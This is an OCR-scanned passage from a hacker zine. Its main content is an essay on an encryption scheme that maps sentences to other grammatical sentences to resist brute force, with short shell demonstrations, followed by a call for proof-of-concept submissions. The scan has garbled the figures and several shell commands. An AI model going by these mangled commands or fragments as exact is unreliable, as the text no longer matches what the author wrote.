Simon, Tara Miller, Mike Ossmann, Rob Ghilduta, 
and Travis Goodspeed for their direct support. 
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80 
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3.01/i#, 24T, 18' 


40 


270 
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Figure 20: Filter Bill of Materials 



57 



(2/ji) 2 1 (2/ji) 2 















f2/3ji) 2 






\ (2/3JI) 2 




r ■- ■' 

h h ; 






\ 

i 

■i 
■i 


(2/5nr 


• • r •-' 


^ , J 
j 






i * 
i * 
\> 


["V:.r::.A... 



-5/2T -2/T -3/2T -1/T -1/2T 0 1/2T 1/T 3/2T 2/T 5/2T 



Figure 21: PiFM Harmonic Emissions 
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ACT- 1 



MICRO-TERM INC. 




$525 complete with high resolution 9" monitor • $400 without 
monitor | NC LUDED FEATURES: 

• Underline Cursor • 64 characters by 16 lines 

• RS232C or Current Loop • Auto Scrolling 

• All oscillators (horiz., vert., • Data Rates of 110, 300, 600, 
baud rate, and dot size) are 1200, 2400, 4800, and 9600 
crystal controlled baud are jumper selectable 

The ACT-I is a complete teletype replacement compatible with 
any processor which supports a serial I/O port. Completely 
assembled and dynamically tested. 
Prices FOB St. Louis Mastercharge and BankAmericard 



THE AFFORDABLE CRT TERMINAL 



MICRO-TERM INC. P.O. BOX 9387 ST. LOUIS, MO. 63117 

(314) 645-3656 
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12 Weird cryptography; or, 

How to resist brute-force attacks. 



by Philippe Teuwen 

"Unbreakable, sir?" she said uneasily. "What about the Bergofsky Principle?" 

Susan had learned about the Bergofsky Principle early in her career. It was a cornerstone of brute- 
force technology. It was also Strathmore' s inspiration for building TRANSLTR. The principle 
clearly stated that if a computer tried enough keys, it was mathematically guaranteed to find the 
right one. A code's security was not that its pass-key was unfindable but rather that most people 
didn't have the time or equipment to try. 

Strathmore shook his head. "This code's different." 

"Different?" Susan eyed him askance. An unbreakable code is a mathematical impossibility! He 
knows that! 

Strathmore ran a hand across his sweaty scalp. "This code is the product of a brand new encryption 
algorithm— one we've never seen before." 

[...] 

"Yes, Susan, TRANSLTR will always find the key— even if it's huge." He paused a long moment. 
"Unless..." 

Susan wanted to speak, but it was clear Strathmore was about to drop his bomb. Unless what? 
"Unless the computer doesn't know when it's broken the code." 
Susan almost fell out of her chair. "What!" 

"Unless the computer guesses the correct key but just keeps guessing because it doesn't realize it 
found the right key. " Strathmore looked bleak. "I think this algorithm has got a rotating cleartext. " 

Susan gaped. 

The notion of a rotating cleartext function was first put forth in an obscure, 1987 paper by a 
Hungarian mathematician, Josef Harne. Because brute-force computers broke codes by examining 
cleartext for identifiable word patterns, Harne proposed an encryption algorithm that, in addition 
to encrypting, shifted decrypted cleartext over a time variant. In theory, the perpetual mutation 
would ensure that the attacking computer would never locate recognizable word patterns and thus 
never know when it had found the proper key. 

Yes, we are in a pure sci-fi techno-thriller. Some of you may have recognized this excerpt from the Digital 
Fortress by Dan Brown, published in 1998. Not surprisingly, there is no such thing as the concept of rotating 
cleartext or Bergofsky Principle, and Josef Harne never existed. 

There is still a germ of an interesting idea: What if "the computer guesses the correct key but just keeps 
guessing because it doesn't realize it found the right key"? Instead of trying to conceal plaintext in yet 
another layer of who-knows-what, let's try to make the actual plaintext indistinguishable from incorrectly 
decoded ciphertext. It would be a bit similar to format-preserving encryption (FPE) 59 where ciphertext 
looks similar to plaintext and honey encryption, 60 which both share the motivation to resist brute-force. 
But beyond single words and passwords, I want to encrypt full sentences. . . into other grammatically correct 
sentences! Now if Eve wants to brute- force such an encrypted message, every single wrong key would produce 
a somehow plausible sentence. She would have to choose amongst all "decrypted" plaintext candidates for 
the one that was my initial sentence. 

So starts a war of natural language models. . . Anything the cryptanalyst can find to discard a candidate 
can be used in turn to tune the initial grammar model to create more plausible candidates. The problem 

59 https : //en. wikipedia. org/wiki/Format-preserving_encryption 
60 http : //pages . cs . wise . edu/ rist/papers/HoneyEncryptionpre . pdf 
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for the crypt analyst C can be expressed as a variation of the Turing test, where the test procedure is not a 
dialog but consists of presenting n texts, of which n — 1 were produced by a machine A, and only one was 
written by a human B (cf. Fig. 22.) 




Figure 22: Turing test, our way. 



We'll start with a mapping between sentences and their numerical representations. Let's represent a 
language by a graph. Each sentence is one path through the language graph. Taking another random 
path will lead to another grammatically correct sentence. To encrypt a message, the first step is to encode 
it as a description of the path through the grammar graph. This path has to be identified numerically 
(enumerated) among the possible paths. Ideally, the enumeration must be balanced by the frequency of 
common grammatical constructions and vocabulary, something you get more or less for free if you manage 
to map some Huffman coding onto it. If there is a complete map between all the paths up to a given length 
and a bounded set of integers, then we have the guarantee that any random pick in the set will be accepted 
by the deciphering routine and will lead to a grammatically correct sentence. So the numerical representation 
can now be ciphered by any classic symmetric cipher. 

A complete solution has to follow a few additional rules. It must not include any metadata that would 
confirm the right key when brute- forced, so e.g., it shouldn't introduce any checksum over the plaintext that 
could be used by an attacker to validate candidates! And any wrong key should lead to a proper deciphering 
and a valid sentence, no exception. 

Such encoding method covering a balanced language graph could serve as a basis for a pretty cool natural 
language text compressor, which works a bit like ordering the numbers 3, 10, and 12 in a Chinese restaurant. 
(I recommend the 12.) 

In practice, some junk can be tolerated in the brute-forced candidates; in fact, even a lot of junk could 
be fine! For example, 99% of detectable junk would lead to a loss of just 6.6 bits of key material. 

12.1 Enough talk. Show me a PoC or you-know-what! 

Fair enough. 

We need to parse English sentences, so a good starting point may be grammar checkers: 

$ apt -cache show link - grammar 

Descr ipt ion - en : Carnegie Mellon University's link grammar parser 

In Selator , D. and Temperly , D. "Parsing English with a Link 
Grammar" (1991) , the authors defined a new formal grammatical system 
called a "link grammar". A sequence of words is in the language of a 
link grammar if there is a way to draw "links" between words in such a 
way that the local requirements of each word are satisfied, the links 
do not cross, and the words form a connected graph. The authors 
encoded English grammar into such a system , and wrote this program to 
parse English using this grammar. 



61 



link -grammar sounds like a good tool to play with. 

Here is, for example, how it parses a quote from Jesse Jackson: "I take my role seriously as a pastor". 

+ MVp + 

+ MVa + | 

+ Qs + | + Js + 

+-Sp*i+ +-Ds-+ | | +--Ds-+ 

I I I I I || I 

I.p take . v my role.n seriously as . p a pastor. n 

The difficulty is the enumeration of paths that would cover the key space if we want to map one path 
to another one. So, for a first attempt, let's keep the grammatical structure of the plaintext, and we will 
replace every word by another that respects the same structure. After wrapping some Bash scripting around 
link-grammar and its dictionaries, here's what we can get: 



$ echo "my example illustrates 


a means to obfus 


>cate 


a complex sentence easily" 


. / encode 


023:2 n. 1:2865 v. 4. 2:1050 a n 


1 :4908 to v .4. 1 


1352 


a adj . 1 : 720 n . 1 : 7124 adv . 1 


369 



This is one possible encoding of the input: every word is replaced by a reference to a wordlist and its 
position in the list. Hopefully, another script allows us to reverse this process: 

$ echo "my example illustrates a means to obfuscate a complex sentence easily " | ./ encode | . /decode 
my example illustrates a means to obfuscate a complex sentence easily 



So far, so good. Now we will encode the positions using a secret key (123 in this example) with a very 
very stupid 16-bit numeric cipher. 



$ echo "my 
023 : 1 n . 1 


example illustrates a means to obfuscate a 
7695 v. 4. 2:2054 a n. 1:2759 to v. 4. 1:2070 a 


complex sentence easily" | 
adj . 1 : 2518 n . 1 : 5439 adv . 1 


/ encode 
123 


123 






$ echo "my 
my example 


example illustrates a means to obfuscate a 
illustrates a means to obfuscate a complex 


complex sentence easily" | 
sentence easily 


/ encode 


123 | 


. / decode 


123 


$ echo "my 
its storey 


example illustrates a means to obfuscate a complex sentence easily" I 
siphons a blink to terrify a sublime filbert irretrievably 


/ encode 


123 | 


. / decode 


124 



Using any wrong key would lead to another grammatically correct sentence. So we managed to build an 
(admittedly stupid) crypto system that is pretty hard to bruteforce, as all attempts would lead to grammat- 
ically correct sentences, giving no clue to the bruteforcing attacker. It is nevertheless only moderately hard 
to break, because one could, for example, classify the results by frequency of those words or word groups in 
English text to keep the best candidates. But the same reasoning can be used to enhance the PoC and get 
better statistical results, harder for an attacker to disqualify. 

Actually, we can do better: let's send one of those weird sentences instead of the encoded path. This 
gives plausible deniability: you can even deny it is a message encoded with this method, and claim that you 
wrote it after partaking of a few Laphroaig Quarter Cask ;-) British neighbors are advised, however, that if 
this leads to the UK banning Laphroaig Quarter Cask for public safety reasons, the Pastor might no longer 
be their friend. 

$ echo "my example illustrates a means to obfuscate a complex sentence easily " | ./ encode |. /decode 123 
your search cements a tannery to escort a unrelieved clause exuberantly 



This can be deciphered by whoever knows the key: 

$ echo "your search cements a tannery to escort a unrelieved clause exuberant ly " | ./ encode 1231 . /decode 
my example illustrates a means to obfuscate a complex sentence easily 



And an attempt to decipher it with a wrong key gives another grammatically correct sentence: 
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$ echo "your search cements a tannery to escort a unrelieved clause exuberant ly " | ./ encode 1 24 | . /decode 
your scab slakes a bluffer to integrate a introspective hamburger provocatively 



If someone attempts to brute-force it, she would end up with something like this: 

$ echo "your search cements a tannery to escort a unrelieved clause exuberantly " | . /bruteforce 

22366: their presentiment reprehends a saxophone to irk a topless mind perennially 
22367 : your cry compounds a examiner to shoulder a massive bootlegger unconsciously 
22368 : our handcart renounces a lamplighter to imprint a outbound doorcase weakly 

22369 : my neurologist fascinates a plenipotentiary to butcher a psychedelic imprint automatically 

22370: their safecracker vents a spoonerism to refurnish a shaggy parodist complacently 

22371: your epicure extols a governor to belittle a indecorous clip heatedly 

22372 : our kilt usurps a monger to punish a loud foothold indirectly 

22373 : my piranha mugs a resistor to evict a obstetric malaise laconically 

22374: its controller unsettles a duchess to ponder a diversionary beggar riotously 

22375 : your glen mollifies a interjection to embezzle a forgetful decibel speciously 

22376 : our misdeal countermands a pedant to typify a imperturbable heyday topically 

22377: their bower misstates a colloquialism to disorientate a apoplectic warrantee courteously 

22378: its downpour copies a frolic to sweeten a circumspect cavalcade dispiritedly 

22379 : your infidel resurrects a masseuse to manufacture a differential fairway famously 

22380 : my abstract contaminates a birthplace to squire a unaltered subsection lukewarmly 

22381: their co-op resents a deuce to inveigle a unsubtle attendant objectionably 



The scripts are available in this issue's PDF/ZIP, but the PDF itself can be used to secure your 
communications— because why not? 



$ chmod +x pocorgtfo08.pdf 






$ echo "encrypt this sentence !" 


I . / pocorgt f o08 . pdf - 


-e 12345 


besmirch this carat ! 






$ echo "besmirch this carat !" | 


.7pocorgtfo08.pdf -d 


12345 


encrypt this sentence ! 







The PDF includes an ELF x86-64 version of link -grammar, so you will need to execute the PDF on a 
matching platform. Any 64-bit Debian-like distro with libaspelll5 installed should do. 

For extra credit, you may construct a meaningful sentence that encodes to Chomsky's famously mean- 
ingless but grammatical example, "Colorless green ideas sleep furiously." 

Ideas presented in this little essay were first discussed by the author at Hack.lu 2007 HackCamp. 

Have fun! 
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13 Fast Cash for Cyber Munitions! 



by Pastor Manul Laphroaig, 
Unlicensed Proselytizer 
International Church of the Weird Machines 

Howdy, neighbor! 

Are you one of those merchants of cyber-death that certain Thought Leading Technologists keep warning 
us about? Have you been hoarding bugs instead of sharing them with the world? Well, at this church we 
won't judge you, but we'd be happy to judge your proofs of concept, sharing the best ones with our beloved 
readers. 

So set that little PoC free, neighbor, and let it come to me, pastor @phrack 8 org! 



Do this: write an email telling our editors how to do reproduce ONE clever, technical trick from your 
research. If you are uncertain of your English, we'll happily translate from French, Russian, or German. If 
you don't speak those languages, we'll draft a translator from those poor sods who owe us favors. 

Like an email, keep it short. Like an email, you should assume that we already know more than a bit 
about hacking, and that we'll be insulted or— WORSE!— that we'll be bored if you include a long tutorial 
where a quick reminder would do. 

Just use 7-bit ASCII if your language doesn't require funny letters, as whenever we receive something 
typeset in OpenOffice, we briefly mistake it for a ransom note. Don't try to make it thorough or broad. 
Don't use Powerpoint bullet-points. Keep your code samples short and sweet; we can leave the long- form 
code as an attachment. 

Do pick one quick, clever low-level trick and explain it in a few pages. Teach me how to distinguish 
real errors from intentionally mistransmitted symbols over radio. Show me how to reverse engineer firmware 
from a combine harvester. Don't tell me that it's possible; rather, teach me how to do it myself with the 
absolute minimum of formality and bullshit. 

Like an email, we expect informal (or faux-biblical) language and hand-sketched diagrams. Write it in 
a single sitting, and leave any editing for your poor preacherman to do over a bottle of fine scotch. Send 
this to pastor@phrack.iOrg and hope that the neighborly Phrack folks— praise be to them!— aren't man-in- 
the-middling our submission process. 

Yours in PoC and Pwnage, 
Pastor Manul Laphroaig, D.D. 
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